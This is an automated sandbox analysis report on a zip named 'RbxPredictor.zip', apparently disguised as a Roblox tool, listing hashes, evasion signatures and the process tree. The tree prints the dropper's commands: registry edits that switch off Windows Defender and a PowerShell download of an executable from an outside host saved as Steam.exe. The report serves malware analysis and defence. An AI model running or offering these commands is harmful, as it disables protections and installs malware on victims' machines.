393e6146e706e3c6791183d7d10217b1e5ec1734720e33a722e374dbdede42f8

Analysis

max time kernel
49s
max time network
130s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
15/04/2024, 05:42

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

RbxPredictor.zip
Size

1KB
MD5

480044b105904304611c493e0b87336a
SHA1

907a66eecceaf3e56d703e7befa4be1e3cc7dc21
SHA256

393e6146e706e3c6791183d7d10217b1e5ec1734720e33a722e374dbdede42f8
SHA512

f597c0a83f1ebdfe2890ef90240f6e410aa8bd2594214e61962746a71d30e86cd88542294eeb60db8e420d52883e7fe1edc2806cdb9a7d600f0b2e4777b665d4

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://api.discreetshare.com/download/661c3ef3bc689571708caf56

Signatures

Delays execution with timeout.exe 8 IoCs

evasion

pid	Process
2504	timeout.exe
2436	timeout.exe
452	timeout.exe
2268	timeout.exe
308	timeout.exe
2444	timeout.exe
1732	timeout.exe
1676	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2224	chrome.exe
2224	chrome.exe

Suspicious use of AdjustPrivilegeToken 48 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe
Token: SeShutdownPrivilege	2224	chrome.exe

Suspicious use of FindShellTrayWindow 35 IoCs

pid	Process
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe
2224	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2224 wrote to memory of 1648	2224	chrome.exe	29
PID 2224 wrote to memory of 1648	2224	chrome.exe	29
PID 2224 wrote to memory of 1648	2224	chrome.exe	29
PID 2224 wrote to memory of 2724	2224	chrome.exe	31
PID 2224 wrote to memory of 2724	2224	chrome.exe	31
PID 2224 wrote to memory of 2724	2224	chrome.exe	31
PID 2224 wrote to memory of 2724	2224	chrome.exe	31
PID 2224 wrote to memory of 2724	2224	chrome.exe	31
PID 2224 wrote to memory of 2724	2224	chrome.exe	31
PID 2224 wrote to memory of 2724	2224	chrome.exe	31
PID 2224 wrote to memory of 2724	2224	chrome.exe	31
PID 2224 wrote to memory of 2724	2224	chrome.exe	31
PID 2224 wrote to memory of 2724	2224	chrome.exe	31
PID 2224 wrote to memory of 2724	2224	chrome.exe	31
PID 2224 wrote to memory of 2724	2224	chrome.exe	31
PID 2224 wrote to memory of 2724	2224	chrome.exe	31
PID 2224 wrote to memory of 2724	2224	chrome.exe	31
PID 2224 wrote to memory of 2724	2224	chrome.exe	31
PID 2224 wrote to memory of 2724	2224	chrome.exe	31
PID 2224 wrote to memory of 2724	2224	chrome.exe	31
PID 2224 wrote to memory of 2724	2224	chrome.exe	31
PID 2224 wrote to memory of 2724	2224	chrome.exe	31
PID 2224 wrote to memory of 2724	2224	chrome.exe	31
PID 2224 wrote to memory of 2724	2224	chrome.exe	31
PID 2224 wrote to memory of 2724	2224	chrome.exe	31
PID 2224 wrote to memory of 2724	2224	chrome.exe	31
PID 2224 wrote to memory of 2724	2224	chrome.exe	31
PID 2224 wrote to memory of 2724	2224	chrome.exe	31
PID 2224 wrote to memory of 2724	2224	chrome.exe	31
PID 2224 wrote to memory of 2724	2224	chrome.exe	31
PID 2224 wrote to memory of 2724	2224	chrome.exe	31
PID 2224 wrote to memory of 2724	2224	chrome.exe	31
PID 2224 wrote to memory of 2724	2224	chrome.exe	31
PID 2224 wrote to memory of 2724	2224	chrome.exe	31
PID 2224 wrote to memory of 2724	2224	chrome.exe	31
PID 2224 wrote to memory of 2724	2224	chrome.exe	31
PID 2224 wrote to memory of 2724	2224	chrome.exe	31
PID 2224 wrote to memory of 2724	2224	chrome.exe	31
PID 2224 wrote to memory of 2724	2224	chrome.exe	31
PID 2224 wrote to memory of 2724	2224	chrome.exe	31
PID 2224 wrote to memory of 2724	2224	chrome.exe	31
PID 2224 wrote to memory of 2724	2224	chrome.exe	31
PID 2224 wrote to memory of 2692	2224	chrome.exe	32
PID 2224 wrote to memory of 2692	2224	chrome.exe	32
PID 2224 wrote to memory of 2692	2224	chrome.exe	32
PID 2224 wrote to memory of 2604	2224	chrome.exe	33
PID 2224 wrote to memory of 2604	2224	chrome.exe	33
PID 2224 wrote to memory of 2604	2224	chrome.exe	33
PID 2224 wrote to memory of 2604	2224	chrome.exe	33
PID 2224 wrote to memory of 2604	2224	chrome.exe	33
PID 2224 wrote to memory of 2604	2224	chrome.exe	33
PID 2224 wrote to memory of 2604	2224	chrome.exe	33
PID 2224 wrote to memory of 2604	2224	chrome.exe	33
PID 2224 wrote to memory of 2604	2224	chrome.exe	33
PID 2224 wrote to memory of 2604	2224	chrome.exe	33
PID 2224 wrote to memory of 2604	2224	chrome.exe	33
PID 2224 wrote to memory of 2604	2224	chrome.exe	33
PID 2224 wrote to memory of 2604	2224	chrome.exe	33
PID 2224 wrote to memory of 2604	2224	chrome.exe	33
PID 2224 wrote to memory of 2604	2224	chrome.exe	33
PID 2224 wrote to memory of 2604	2224	chrome.exe	33
PID 2224 wrote to memory of 2604	2224	chrome.exe	33
PID 2224 wrote to memory of 2604	2224	chrome.exe	33
PID 2224 wrote to memory of 2604	2224	chrome.exe	33

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\RbxPredictor.zip
1⤵
PID:2300

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2224
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef71d9758,0x7fef71d9768,0x7fef71d9778
  2⤵
  PID:1648
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1192 --field-trial-handle=1244,i,13895753200278473120,1095994441927858823,131072 /prefetch:2
  2⤵
  PID:2724
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1524 --field-trial-handle=1244,i,13895753200278473120,1095994441927858823,131072 /prefetch:8
  2⤵
  PID:2692
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1632 --field-trial-handle=1244,i,13895753200278473120,1095994441927858823,131072 /prefetch:8
  2⤵
  PID:2604
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2296 --field-trial-handle=1244,i,13895753200278473120,1095994441927858823,131072 /prefetch:1
  2⤵
  PID:2756
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2308 --field-trial-handle=1244,i,13895753200278473120,1095994441927858823,131072 /prefetch:1
  2⤵
  PID:2804
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1580 --field-trial-handle=1244,i,13895753200278473120,1095994441927858823,131072 /prefetch:2
  2⤵
  PID:2084
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3004 --field-trial-handle=1244,i,13895753200278473120,1095994441927858823,131072 /prefetch:1
  2⤵
  PID:1616
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3436 --field-trial-handle=1244,i,13895753200278473120,1095994441927858823,131072 /prefetch:8
  2⤵
  PID:1492
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3476 --field-trial-handle=1244,i,13895753200278473120,1095994441927858823,131072 /prefetch:8
  2⤵
  PID:944
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3716 --field-trial-handle=1244,i,13895753200278473120,1095994441927858823,131072 /prefetch:8
  2⤵
  PID:2268
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3444 --field-trial-handle=1244,i,13895753200278473120,1095994441927858823,131072 /prefetch:8
  2⤵
  PID:1528
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3756 --field-trial-handle=1244,i,13895753200278473120,1095994441927858823,131072 /prefetch:8
  2⤵
  PID:568
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=700 --field-trial-handle=1244,i,13895753200278473120,1095994441927858823,131072 /prefetch:1
  2⤵
  PID:1608
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3464 --field-trial-handle=1244,i,13895753200278473120,1095994441927858823,131072 /prefetch:1
  2⤵
  PID:2308
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=2492 --field-trial-handle=1244,i,13895753200278473120,1095994441927858823,131072 /prefetch:1
  2⤵
  PID:2624
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=3412 --field-trial-handle=1244,i,13895753200278473120,1095994441927858823,131072 /prefetch:1
  2⤵
  PID:1984
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2756 --field-trial-handle=1244,i,13895753200278473120,1095994441927858823,131072 /prefetch:8
  2⤵
  PID:3048
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=3468 --field-trial-handle=1244,i,13895753200278473120,1095994441927858823,131072 /prefetch:1
  2⤵
  PID:2300
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=2460 --field-trial-handle=1244,i,13895753200278473120,1095994441927858823,131072 /prefetch:1
  2⤵
  PID:1572
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=3840 --field-trial-handle=1244,i,13895753200278473120,1095994441927858823,131072 /prefetch:1
  2⤵
  PID:2148
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=3604 --field-trial-handle=1244,i,13895753200278473120,1095994441927858823,131072 /prefetch:1
  2⤵
  PID:2804
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=3912 --field-trial-handle=1244,i,13895753200278473120,1095994441927858823,131072 /prefetch:1
  2⤵
  PID:1744
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3880 --field-trial-handle=1244,i,13895753200278473120,1095994441927858823,131072 /prefetch:8
  2⤵
  PID:1248
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4080 --field-trial-handle=1244,i,13895753200278473120,1095994441927858823,131072 /prefetch:8
  2⤵
  PID:576

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:2620

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:1752

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\Temp1_RbxPredictor.zip\RbxPredictor\RbxPredictor\RbxPredictor.bat" "
1⤵
PID:1380
- C:\Windows\system32\cacls.exe
  "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
  2⤵
  PID:2412
- C:\Windows\system32\timeout.exe
  timeout 1
  2⤵
  - Delays execution with timeout.exe
  PID:452
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 00000001 /f
  2⤵
  PID:992
- C:\Windows\system32\timeout.exe
  timeout 1
  2⤵
  - Delays execution with timeout.exe
  PID:2268
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 00000001 /f
  2⤵
  PID:800
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://api.discreetshare.com/download/661c3ef3bc689571708caf56', 'C:\Users\Admin\AppData\Roaming\Steam.exe')"
  2⤵
  PID:772
- C:\Windows\system32\timeout.exe
  timeout 2
  2⤵
  - Delays execution with timeout.exe
  PID:308
- C:\Windows\system32\timeout.exe
  timeout 1
  2⤵
  - Delays execution with timeout.exe
  PID:2444
- C:\Windows\system32\timeout.exe
  timeout 2
  2⤵
  - Delays execution with timeout.exe
  PID:1732
- C:\Windows\system32\timeout.exe
  timeout 2
  2⤵
  - Delays execution with timeout.exe
  PID:1676
- C:\Windows\system32\timeout.exe
  timeout 1
  2⤵
  - Delays execution with timeout.exe
  PID:2504
- C:\Windows\system32\timeout.exe
  timeout 4
  2⤵
  - Delays execution with timeout.exe
  PID:2436

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:276

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\4a0306fc-cc90-4bb2-9cef-1f70fda87fd4.tmp

Filesize
6KB

MD5
cc4af342fb76c9dfb6ec1ad27532b45b

SHA1
a0ad3018af4b07d68a8e3619fce9feae0dcf071c

SHA256
c66168e55f31e493c3b84156a0dabb07cf4f9c963e7240df34a8cc4a1df84cdc

SHA512
0dda415288ff0e89b57199eb9197da58b58b6987b1230c2415c944dc62eff040b52020b0dd2a20670518d933153a6ef920f2862063171937a19da9c616c89d46

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
96B

MD5
1210d0f89db54f8ce8313b59556640a9

SHA1
ff02e63579382916e5837988755f0b535689b7d1

SHA256
1ba4ef1ca21eca5c6220da830d863933cc30f7c8cf4148bc16741ff4c8f9910f

SHA512
ce12a741c3fe0a817da0428c156e382a3d87aa025bc4416431c7398aacc000fba83663b138a08ee39d3955c675dac7d2c1ad8d624998b63e400015d6b4285dad

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
931e285982bd167d5175d78ae63dedb4

SHA1
dc68c44edadeb1ba9b6c1a4872cb3a6a6ab0183e

SHA256
0fc5b8b5fa779974ff640a80e332788b8886c4258fdb4b5704616c9c92defa24

SHA512
002227b97a222af4ec4e48fe71027874632f3bff3d244741cbcdd36cae8635dc49e9eb95fd4f9c2a65d63976b2e38ada264c36a41c629a3f1d311a724f6d2ce6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
357028eebbb2742756789a9620d703ca

SHA1
3213264c323a05fb817ad160dffe33577f4f9229

SHA256
a1251fad49e27d5057ff3dccc7d8b0908c0765d54f0017299ef10c415d245d81

SHA512
33e7bdadbb8c1b7488d152d46e3ae666944324d4b23eecd9387dc5f590e32369ad15e17c7e995d2353062df261aeaf522020c87a12718b362396d8a7332ce410

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
905718c7f6923fcf238bb979b0a9318a

SHA1
5725eeaa351db4046f6dba3f3fc54757c032b7be

SHA256
55438383b16dc2637af8879a121125f69da3962721b18579203225e06e24095f

SHA512
9f88336b4712ca7464d95ed7fc8adaa1288b2d14671d0f60a8242880f44ad080b49f4f027338aefd17222f7a2eba887851652331af9f5ae75610125e44bdad45

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp

Filesize
16B

MD5
18e723571b00fb1694a3bad6c78e4054

SHA1
afcc0ef32d46fe59e0483f9a3c891d3034d12f32

SHA256
8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

SHA512
43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
264KB

MD5
4fbd15feefd228231c6926ecf2347b32

SHA1
3c011153e45ba9a001d7d05e48223e08b1f75a09

SHA256
eff8aa947fd1e8865e04d16d3cef3e23cd459e1dd05409b425d19967f8972214

SHA512
28f25461c21f6f728b2ed365a2d13f5a618c718108fdd5824d8e5f1e5ac82eb2aaa97e3c74df56d2c0c68eb24f1e7c388fb23d5770dfd45c94bd98513697f035

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar3AD6.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
memory/276-367-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/276-368-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/772-361-0x000000001B770000-0x000000001BA52000-memory.dmp

Filesize
2.9MB

Download
memory/772-364-0x0000000002C30000-0x0000000002CB0000-memory.dmp

Filesize
512KB

Download
memory/772-365-0x000007FEF36B0000-0x000007FEF404D000-memory.dmp

Filesize
9.6MB

Download
memory/772-366-0x0000000002C30000-0x0000000002CB0000-memory.dmp

Filesize
512KB

Download
memory/772-363-0x0000000002770000-0x0000000002778000-memory.dmp

Filesize
32KB

Download
memory/772-362-0x000007FEF36B0000-0x000007FEF404D000-memory.dmp

Filesize
9.6MB

Download
memory/772-369-0x0000000002C30000-0x0000000002CB0000-memory.dmp

Filesize
512KB

Download
memory/772-370-0x000007FEF36B0000-0x000007FEF404D000-memory.dmp

Filesize
9.6MB

Download